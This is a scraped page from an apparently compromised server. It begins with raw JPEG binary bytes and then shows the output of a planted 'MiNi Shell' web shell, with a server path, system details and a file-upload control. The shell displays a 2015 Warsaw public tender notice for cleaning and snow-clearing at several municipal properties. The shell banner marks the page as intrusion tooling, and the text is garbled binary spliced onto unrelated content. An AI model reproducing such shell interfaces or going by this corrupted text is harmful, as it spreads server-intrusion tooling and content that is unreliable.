JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/332838-N-2015.html

<p class="kh_header"><b>Warszawa: Usługi utrzymania porządku i czystości dla następujących nieruchomości: ul. Smolna 4, ul. Jana Kazimierza 62, ul. Sokratesa 15, ul. Grójecka 97 w Warszawie</b><br>
<b>Numer ogłoszenia: 332838 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia m. st. Warszawy, jednostka budżetowa , ul. Jana Kazimierza 62, 01-248 Warszawa, woj. mazowieckie, tel. 0-22 8368103, 8773874, faks 8368061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmw.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa m.st. Warszawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi utrzymania porządku i czystości dla następujących nieruchomości: ul. Smolna 4, ul. Jana Kazimierza 62, ul. Sokratesa 15, ul. Grójecka 97 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi utrzymania porządku i czystości dla następujących nieruchomości: ul. Smolna 4, ul. Jana Kazimierza 62, ul. Sokratesa 15 i ul. Grójecka 97w Warszawie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował, a w przypadku świadczeń okresowych lub ciągłych realizuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jako wykonawca lub podwykonawca, co najmniej:
Część 1 Nieruchomość przy ul. Smolnej 4 - TEREN - 1 zadanie obejmujące cykliczne utrzymanie porządku na terenach zewnętrznych o łącznej powierzchni minimum 1200 m2, w okresie co najmniej kolejnych 6 miesięcy, o wartości zadania co najmniej 6 000,00 zł brutto,
Część 2 Nieruchomość przy ul. Smolnej 4 - BUDYNEK Centrum Przedsiębiorczości - 1 zadanie obejmujące cykliczne sprzątanie budynków użyteczności publicznej o łącznej powierzchni minimum 1300 m2, w okresie co najmniej kolejnych 6 miesięcy, o wartości zadania co najmniej 25 000,00 zł brutto,
Część 3 Nieruchomość przy ul. Jana Kazimierza 62 - 1 zadanie obejmujące cykliczne sprzątanie pomieszczeń biurowych i części wspólnych budynków użyteczności publicznej o łącznej powierzchni minimum 1000 m2, w okresie co najmniej kolejnych 6 miesięcy, o wartości zadania co najmniej 20 000,00 zł brutto,
Część 4 Nieruchomość przy ul. Sokratesa 15 - 1 zadanie obejmujące cykliczne utrzymanie porządku na terenach zewnętrznych o łącznej powierzchni minimum 18000 m2, w okresie co najmniej kolejnych 6 miesięcy, o wartości zadania co najmniej 10 000,00 zł brutto.
Część 5 Nieruchomość przy ul. Grójeckiej 97 Hala Targowa Zieleniak - 1 zadanie obejmujące cykliczne sprzątanie budynków użyteczności publicznej o łącznej powierzchni minimum 6000 m2, w okresie co najmniej kolejnych 6 miesięcy, o wartości zadania co najmniej 80 000,00 zł brutto,
Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 11.1.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 9 do SIWZ i przedłożonych dowodów dotyczących głównych usług wymienionych w wykazie potwierdzających, że ww. usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że oferowane usługi odpowiadają określonym wymaganiom:
Program nadzoru nad wykonywaniem usług (program zapewnienia jakości) sprawowanego przez przedstawiciela wykonawcy, mający na celu zapewnienie i utrzymanie wysokiej jakości usług oraz bieżącej czystości obiektu. Czynności nadzoru winny być dokumentowane w książce kontroli czystości obiektu, zapewnionej i prowadzonej przez wykonawcę, która musi być całodobowo dostępna na danym obiekcie dla upoważnionych pracowników zamawiającego. Program powinien określać w szczególności: 
1. Deklarowany przez wykonawcę sposób nadzoru nad utrzymującymi czystość pracownikami (organizacja nadzoru) sprawowanego przez przedstawiciela wykonawcy, lub Wykonawcę mający na celu zapewnienie i utrzymanie wysokiej jakości usług, bieżącej czystości budynku/terenu, ciągłości zaopatrzenia w środki niezbędne do wykonania danego zadania.
2. Deklarowany sposób reagowania na uwagi i spostrzeżenia Zamawiającego lub zauważone uchybienia w wykonywaniu usługi, sprawność komunikowania się z Zamawiającym i dokumentowania czynności nadzoru, szybkość reakcji i przystąpienia do usuwania nieprawidłowości, metody dyscyplinowania pracowników oraz zasady poprawy jakości świadczonych usług, do których zgłoszono zastrzeżenia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy przedłożyć w szczególności pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (oryginał lub kopia poświadczona notarialnie) - wzór stanowi załącznik nr 6 do SIWZ.
Zamawiający wymaga, aby składany dokument:
- wskazywał okres jakiego dotyczy zobowiązanie,
- zawierał informację, który zasób jest udostępniany przez inny podmiot,
- w przypadku udostępnienia wiedzy i doświadczenia, określał konkretną formę udziału ww. podmiotu w realizacji zamówienia (np. podwykonawstwo, doradztwo itp.),
- jaki stosunek łączy wykonawcę z podmiotem udostępniającym zasób (np. umowa zlecenie, umowa o współpracę, kontrakt, inne).
Zgodnie z art. 26 ust. 2e ustawy, podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy
Wykaz pozostałych dokumentów wymaganych przez zamawiającego:
1. Wypełniony i podpisany formularz ofertowy - załącznik nr 3 do SIWZ.
2. Pełnomocnictwo dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu wykonawcy (jeżeli reprezentuje go pełnomocnik) - oryginał lub kopia poświadczona notarialnie.
3. Pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia) - oryginał lub kopia poświadczona notarialnie.
4. Wypełniony i podpisany Formularz cenowy (zgodnie z wymaganiami określonymi w poz. 18.2 SIWZ) - załącznik nr 8 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Program zapewnienia jakości - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmw.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia m.st. Warszawy, ul. Jana Kazimierza 62, IV piętro, pok. nr 406.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 11:00, miejsce: Zarząd Mienia m.st. Warszawy, ul. Jana Kazimierza 62, IV piętro, pok. nr 500.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Klauzule społeczne
Wykonawca jest zobowiązany zatrudnić, na podstawie umowy o pracę w pełnym wymiarze czasu pracy, osoby, o których mowa w art. 29 ust. 4 pkt. 4 ustawy Prawo zamówień publicznych, wykonujące czynności fizyczne (pracownik fizyczny) związane z realizacją przedmiotowego zamówienia, przez cały okres realizacji zamówienia. Zastrzeżenie powyższe nie dotyczy Wykonawcy, który osobiście będzie wykonywał usługi będące przedmiotem zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nieruchomość przy ul. Smolnej 4 - TEREN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres prac wchodzą :
1. Codzienne utrzymanie czystości w otoczeniu budynku i na terenie zewnętrznym bezpośrednio przylegającym do ogrodzenia nieruchomości w tym:
- zamiatanie,
- usuwanie śmieci z zewnętrznych koszy wraz z ich myciem,
- zbieranie śmieci z terenu utwardzonego, pasów zieleni oraz terenu przyległego do 
    ogrodzenia (2 m od ogrodzenia) i wrzucanie do pojemnika, 
- usuwanie liści z części utwardzonych i terenu zielonego wraz z załadunkiem do 
     worków do tego celu przeznaczonych,
- raz na 2 tygodnie wywóz zgromadzonych worków z liśćmi na składowiska do tego
    przeznaczone,
- wykonywanie innych czynności utrzymujących estetykę nieruchomości,
2. codzienne utrzymywanie czystości w pomieszczeniu śmietnika oraz w pomieszczeniu składziku na sprzęt Wykonawcy,  wskazanym przez Zamawiającego,
3. raz w miesiącu, a w okresie wiosenno-letnim raz w tygodniu, ciśnieniowe mycie altany śmietnikowej wraz z dezynfekcją,
4. czyszczenie dna kanału odwodnienia terenu zielonego z liści i śmieci - minimum raz na 2 tygodnie a jeśli zajdzie potrzeba to częściej,
5. w okresie zimowym odśnieżanie terenu utwardzonego i posypywanie właściwą mieszanką w celu likwidacji oblodzenia, usuwanie błota pośniegowego (wykonawca przystąpi do odśnieżania w ciągu 2 godzin od chwili wystąpienia opadów śniegu także w dni wolne od pracy). Zgarnięty śnieg może być pryzmowany na części zieleni nie dłużej niż 2 tygodnie. Po upływie tego czasu pryzmy śniegu należy wywieść na składowiska do tego przeznaczone.
Maksymalna ilość czynności odśnieżania w okresie trwania umowy nie może przekroczyć  30-tu razy w roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Program zapewnienia jakości - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nieruchomość przy ul. Smolnej 4 - BUDYNEK Centrum Przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowy zakres obowiązków:
1. Codzienne sprzątanie budynku od poniedziałku do niedzieli (7 razy w tygodniu) w tym:
- dokładne odkurzanie wykładzin, 
- dokładne zamiatanie (ew. odkurzanie) i mycie pozostałego rodzaju podłóg oraz schodów klatki schodowej, przy czym klatka schodowa i hol wejściowy przy recepcji - 2 razy dziennie - przed 8:00 i ok. 14:00,
- dokładne mycie urządzeń sanitarnych w toaletach (także usuwanie kamienia i rdzy), armatury, luster w toaletach, akcesoriów, drzwi do kabin ustępowych (czarny lakier połysk) i klamek - 2 razy dziennie - przed 8:00 rano i ok. 14:00, 
- utrzymanie czystości w aneksach kuchennych (zlewy, armatura, blaty, stoły, siedziska) - 2 razy dziennie - przed 8.00 rano i ok. 14.00, 
- czyszczenie i mycie kuchenek mikrofalowych - szt. 2,
- czyszczenie i mycie ekspresów do kawy - szt. 2,
- wycieranie wyposażenia pomieszczeń biurowych (meble - zarówno powierzchnie poziome jak i widoczne powierzchnie pionowe) środkami przeznaczonymi do czyszczenia mebli,
- mycie parapetów wewnętrznych,
- wyrzucanie śmieci z koszy znajdujących się w pomieszczeniach, również w toaletach (Zamawiający dysponuje pojemnikami na odpady) oraz wymiana toreb higienicznych,
- czyszczenie wycieraczek wejściowych budynku,
- mycie drzwi wejściowych do budynku,
- wykładanie i uzupełnianie środków toaletowych takich jak papier toaletowy, ręczniki papierowe, mydło w płynie (akcesoria w toaletach marki Merida), kostki zapachowe do pisuarów i muszli ustępowych, środki do mycia naczyń, środki do zmywarek (kostki marki SOMAT, sól do zmywarek, nabłyszczasz) do wszystkich toalet i aneksów kuchennych (w toaletach usytuowanych na parterze uzupełnianie środków toaletowych w takiej samej ilości co na I piętrze budynku - pozostałą ilość uzupełnia najemca kawiarni).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nieruchomość przy ul. Jana Kazimierza 62.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach sprzątania budynku Zleceniobiorca jest zobowiązany do wykonywania następujących czynności:
1) Pomieszczenie ochrony, hol, korytarze, winda i klatka schodowa,
-codzienne odkurzanie wykładzin w korytarzach oraz stopni i podestów klatek schodowych,
-codzienne czyszczenie windy (drzwi, posadzka, lustro i ściany wewnętrzne)
-codzienne zmywanie, odkurzanie podłóg, ścieranie parapetów wewnętrznych, wyrzucanie śmieci, opróżnianie popielniczek,
-mycie w miarę potrzeby, nie rzadziej niż raz w miesiącu, drzwi i futryn, grzejników, plafonów oświetleniowych, koszy na śmiecie, balustrad schodowych, lamperii,
2) Pomieszczenia biurowe,
-codzienne odkurzanie wykładzin pokojowych, na korytarzu oraz klatce schodowej przed windą,
-codzienne ścieranie kurzu z biurek, szaf, szafek, półek i innych sprzętów znajdujących się w pokojach,
-codzienna konserwacja blatów biurek, stołów i szafek oraz drzwi szaf biurowych przeznaczonymi do tego środkami,
-w miarę potrzeby mycie, nie rzadziej niż raz w tygodniu drzwi, futryn, lamperii olejnej, wyłączników oświetlenia, parapetów i grzejników oraz zdejmowanie pajęczyn,
-codzienne wyrzucanie śmieci z koszy.
3) Kuchnie i sanitariaty,
-codzienne mycie podłogi, lamperii, glazury i wszystkich urządzeń sanitarnych,
-mycie i przecieranie w miarę potrzeb, nie mniej niż raz w tygodniu drzwi wraz z futrynami, parapetów, grzejników, osłon oświetleniowych, koszy na śmieci i innego wyposażenia,
-2 razy w roku mycie lodówek szt. 3.
4) Mycie okien : dwa razy w roku  (wiosna, jesień).
5) Pranie wykładziny dywanowej: jeden raz w roku  (w razie potrzeby w terminie wskazanym przez Zamawiającego).
6) Mechaniczne mycie posadzek kamiennych - 1 raz w roku (klatka schodowa, hol i korytarze parteru i poziomu -1) 
7) Inne czynności :
-wykonywanie innych czynności mających wpływ na czystość i estetykę budynku uzgodnionych ze Zleceniodawcą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nieruchomość przy ul. Sokratesa 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres prac wchodzą :
1. Bieżące utrzymanie czystości w otoczeniu budynków i na terenie zewnętrznym bezpośrednio przylegającym do ogrodzenia nieruchomości ( zamiatanie, zbieranie śmieci i inne czynności utrzymujące estetykę nieruchomości). 
2. Utrzymanie czystości pomieszczeń zajmowanych przez Zamawiającego: magazyn 500m2, pom biurowe 11m2 , korytarz 30m2.
- Zamiatanie i mycie podłóg
- Wykonywanie innych czynności mających wpływ na czystość i estetykę pomieszczeń uzgodnionych ze Zleceniodawcą 
Maksymalna ilość ww. prac w okresie trwania zamówienia  nie może przekroczyć 6-u razy  w roku
3. Koszenie trawników w tym;
- W razie potrzeby wygrabienie liści i wyzbieranie śmieci
- Wykaszanie trawy przy krawężnikach
- Wywóz skoszonej trawy, śmieci i liści 
Maksymalna ilość ww. prac w okresie trwania zamówienia  nie może przekroczyć 6-u razy  w roku
4. Odśnieżanie terenów utwardzonych w tym:
- odśnieżanie dróg , parkingów , chodników wewnętrznych i zewnętrznych
- Posypywanie solą i piaskiem w celu likwidacji oblodzenia ( utrzymanie chodników czarnych)
- usuwanie błota pośniegowego z chodników wewnętrznych i zewnętrznych.
Maksymalna ilość ww. prac w okresie trwania umowy nie może przekroczyć 26-u razy w roku. 
Przystąpienie do odśnieżania w ciągu 2 godzin od chwili, kiedy zacznie padać śnieg.
5. Raz w roku we wrześniu  odchwaszczanie  pasa zieleni izolacyjnej wraz z wyzbieraniem śmieci z terenu odchwaszczanego oraz wywozem chwastów i śmieci.
Wszelki sprzęt potrzebny do wykonania usług oraz sól , piasek i transport odpadów zabezpiecza Wykonawca.
Wszelkie odpady należy wywozić na składowiska do tego przeznaczone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nieruchomość przy ul. Grójeckiej 97 Hala Targowa Zieleniak.</p>
